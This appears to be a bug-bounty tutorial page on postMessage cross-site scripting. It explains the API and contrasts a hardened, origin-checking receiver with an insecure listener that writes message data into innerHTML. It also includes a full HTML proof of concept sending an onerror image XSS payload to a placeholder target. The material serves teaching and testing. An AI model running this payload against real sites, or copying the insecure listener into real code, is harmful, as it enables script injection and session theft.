
Post Message Xss

Introduction

The postMessage API is widely used in modern web applications to enable cross-origin communication between different windows, iframes, and pop-ups. However, if the receiving application does not properly validate the origin of incoming messages, it may be vulnerable to PostMessage XSS.

This vulnerability allows attackers to send malicious data from an untrusted source (e.g., sandboxed iframe, null origin, or malicious website) to a trusted application, leading to security risks such as data theft, session hijacking, and arbitrary JavaScript execution.


How PostMessage Works

The window.postMessage() function allows scripts running in one window to send messages to another window. The syntax is:

window.postMessage(message, targetOrigin, [transfer]);
  • message: The data to be sent to the target window.

  • targetOrigin: A string specifying the expected origin of the recipient (use "*" to allow any origin, which is insecure).

  • transfer: Optional array of Transferable objects (e.g. ArrayBuffer, MessagePort) whose ownership is moved to the receiving window rather than copied.

Example of secure usage:

window.postMessage("data", "https://trusted-site.com");

Vulnerability: Improper Origin Validation

If an application listens for postMessage events without verifying the sender’s origin, an attacker can exploit this by crafting a malicious message from an unauthorized source.

Example of an Insecure Implementation

window.addEventListener("message", function (event) {
    // No origin validation
    document.body.innerHTML = event.data;
});

Security Issue:

  • The application directly processes any received message without verifying the sender's origin.

  • If an attacker sends a malicious payload (e.g., JavaScript injection), it can lead to XSS.
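For contrast, here is a hardened receiver (an added example, not code from the HowToHunt page): it compares event.origin against an exact allow-list, rejects the "null" origin and look-alike hosts, accepts only a narrow message shape instead of raw HTML, and writes with textContent. The allow-listed origins and the "setGreeting" message type are assumed values for the example.

```javascript
// Assumed allow-list for this example; use your own exact origins (scheme + host + port).
const TRUSTED_ORIGINS = new Set([
  "https://trusted-site.com",
  "https://app.trusted-site.com",
]);

// Exact, case-sensitive match on the whole origin. Avoid startsWith()/indexOf():
// "https://trusted-site.com.evil.example" passes a prefix test, and "null"
// (sandboxed iframe, file: page) must never be treated as trusted.
function isTrustedOrigin(origin) {
  return typeof origin === "string" && TRUSTED_ORIGINS.has(origin);
}

// Accept only a structured message of one known type; plain strings are dropped.
function parseMessage(data) {
  if (typeof data !== "object" || data === null) return null;
  if (data.type !== "setGreeting" || typeof data.text !== "string") return null;
  if (data.text.length > 200) return null;
  return { type: data.type, text: data.text };
}

// Handles one MessageEvent. `render(text)` is injected so the logic runs without a DOM;
// in a browser pass (t) => el.textContent = t. Returns true if the message was accepted.
function handleMessage(event, render) {
  if (!isTrustedOrigin(event.origin)) return false; // untrusted sender: ignore silently
  const msg = parseMessage(event.data);
  if (msg === null) return false;                   // unexpected shape: ignore
  render(msg.text);                                 // textContent, never innerHTML
  return true;
}

// Browser wiring; a no-op under Node where `window` is undefined.
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    handleMessage(event, (t) => { document.getElementById("greeting").textContent = t; });
  });
}

// Constructed sample events exercising the checks above.
function selfCheck() {
  const rendered = [];
  const render = (t) => rendered.push(t);
  const ok = { type: "setGreeting", text: "hello" };
  const accepted   = handleMessage({ origin: "https://trusted-site.com", data: ok }, render);
  const spoofed    = handleMessage({ origin: "https://trusted-site.com.evil.example", data: ok }, render);
  const nullOrigin = handleMessage({ origin: "null", data: ok }, render);
  const rawHtml    = handleMessage({ origin: "https://trusted-site.com", data: "<b>raw html</b>" }, render);
  return { accepted, spoofed, nullOrigin, rawHtml, rendered };
}
```

Note that the check is on event.origin, not on anything inside event.data; the sender controls the payload but cannot forge the browser-supplied origin.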

Exploitation Scenario

  1. The vulnerable website listens for messages using postMessage, but does not check the sender’s origin.

  2. An attacker hosts a malicious page and sends a crafted message to the vulnerable application.

  3. The malicious script gets executed inside the vulnerable website, leading to DOM-based XSS.


Exploiting PostMessage XSS

Proof of Concept (PoC)

The following PoC demonstrates how an attacker can inject malicious JavaScript into a vulnerable application by exploiting a poorly validated postMessage request.

<!doctype html>
<html>
<head>
    <meta charset="UTF-8" />
    <title>PostMessage XSS PoC</title>
    <script>
        // Payload delivered to the target; the vulnerable listener writes it straight into innerHTML.
        var payload = "<img src=x onerror=alert('XSS Exploited')>";

        function pocLink() {
            var ref = window.open('https://vulnerable-website.com'); // Open target in a new window
            ref.postMessage(payload, "https://vulnerable-website.com");
        }

        // Called from the iframe's onload below; sends the same payload to the embedded frame's window.
        function pocFrame(win) {
            win.postMessage(payload, "https://vulnerable-website.com");
        }
    </script>
</head>
<body>
    <a href="#" onclick="pocLink();">Click to Exploit</a>
    <iframe src="https://vulnerable-website.com" onload="pocFrame(this.contentWindow)"></iframe>
</body>
</html>

Breakdown of the Attack

  • The script opens the target vulnerable website in a new window (window.open()).

  • It sends a malicious payload via postMessage() that contains an XSS injection.

  • If the application does not validate the message origin, the payload executes, triggering arbitrary JavaScript execution.


Impact of PostMessage XSS

An attacker exploiting this vulnerability can:

  • Execute malicious JavaScript on the vulnerable application.

  • Steal sensitive data such as session tokens, authentication credentials, or user inputs.

  • Modify page content or inject phishing links.

  • Effectively bypass the Same-Origin Policy (SOP), since the injected script runs with the trusted domain's origin and privileges.

  • Perform clickjacking attacks by embedding the site in an iframe.



Last updated 1 month ago

Enhanced and reformatted for HowToHunt repository by

remonsec